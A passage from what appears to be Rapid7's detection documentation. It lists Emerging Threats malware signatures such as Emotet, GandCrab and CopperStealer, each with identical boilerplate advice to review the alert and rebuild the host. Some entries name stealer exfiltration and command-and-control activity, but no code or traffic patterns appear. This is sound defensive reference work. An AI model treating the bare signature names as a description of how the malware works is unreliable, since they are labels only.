ET MALWARE Win32/Braincrypt Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CandyOpen/UniClient Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CandyOpen/UniClient Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Chinad Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Chinad Retrieving Config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CHIP Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32.Chroject.B ClickFraud Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Chroject.B Requesting ClickFraud Commands from CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Chroject.B Retrieving encoded payload

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ClipBanker.OC CnC Activity M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ClipBanker.OC CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32 Cloaker Related Post Infection Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer CnC Exfil M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer CnC Exfil M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer - Uploading System Information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Comisproc Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Comotor.A!dll Reporting 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CONFUCIUS_B CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CONFUCIUS_B External IP Check to CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CopperStealer Installer Started

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cridex Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Crypren/Zcrypt Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 Ransomware Checkin M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptFile2 / Revenge Ransomware Checkin M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryptInject.BE!MTB Stealer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Crypt.nc Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cryptrun.B Connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Cryptrun.B/MSUpdater C&C traffic 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CryPy Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CryPy Ransomware Encrypting File

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/DanaBot Harvesting Email Addresses 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanaBot Harvesting Email Addresses 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot CnC Task Status

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DanijBot User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkRAT CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkWatchman Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DarkWatchman Checkin Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Datamaikon Checkin myAgent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Datper CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DCRat CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Delf.TJJ Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32 Dialer Variant

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Dipverdle.A Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DMA Locker CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Dofoil.L Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Dorv Stealer Exfiltrating Data to CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/DownloadAdmin Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Downloader.Small.BIL CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Drun Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Dynamer Trojan Dropper User-Agent VB Http

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emold.C Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet.C Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M11

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M4

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M6

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M7

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M8

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Activity (POST) M9

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Checkin (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet CnC Checkin Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Emotet HTML Template Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Enchanim Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Enchanim Process List Dump

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Enemyfear Stealer Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Enosch.A gtalk connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Eris Ransomware CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Expiro.CD Check-in

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fake Anti-Pegasus AV CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.FakeAV.chhq Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.FakeAV POST datan.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.FakeAV.Rean Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/FakeSysdef Rogue AV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/FakeXPA Checkin URL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Fareit.A/Pony Downloader Checkin (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fareit Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fareit Variant Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Final1stspy CnC Checkin (Reaper/APT37 Stage 1 Payload)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fireball Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fluxer CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Formgrabber Data Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fosniw CnC Checkin Style 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fosniw MacTryCnt CnC Style Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fujacks Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Fujacks Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/GandCrab Ransomware CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/GandCrab Ransomware CnC Activity M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Gasti.tm Checkin Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Gatak Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Gatak.DR Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Gatak.DR Payload Instructions

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/GenKryptik.FKJZ CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Genome Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Geodo Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Girostat Stealer (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Glupteba/ClIEcker CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/GrandaMisha Sending System Information (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Grimagent CnC Activity

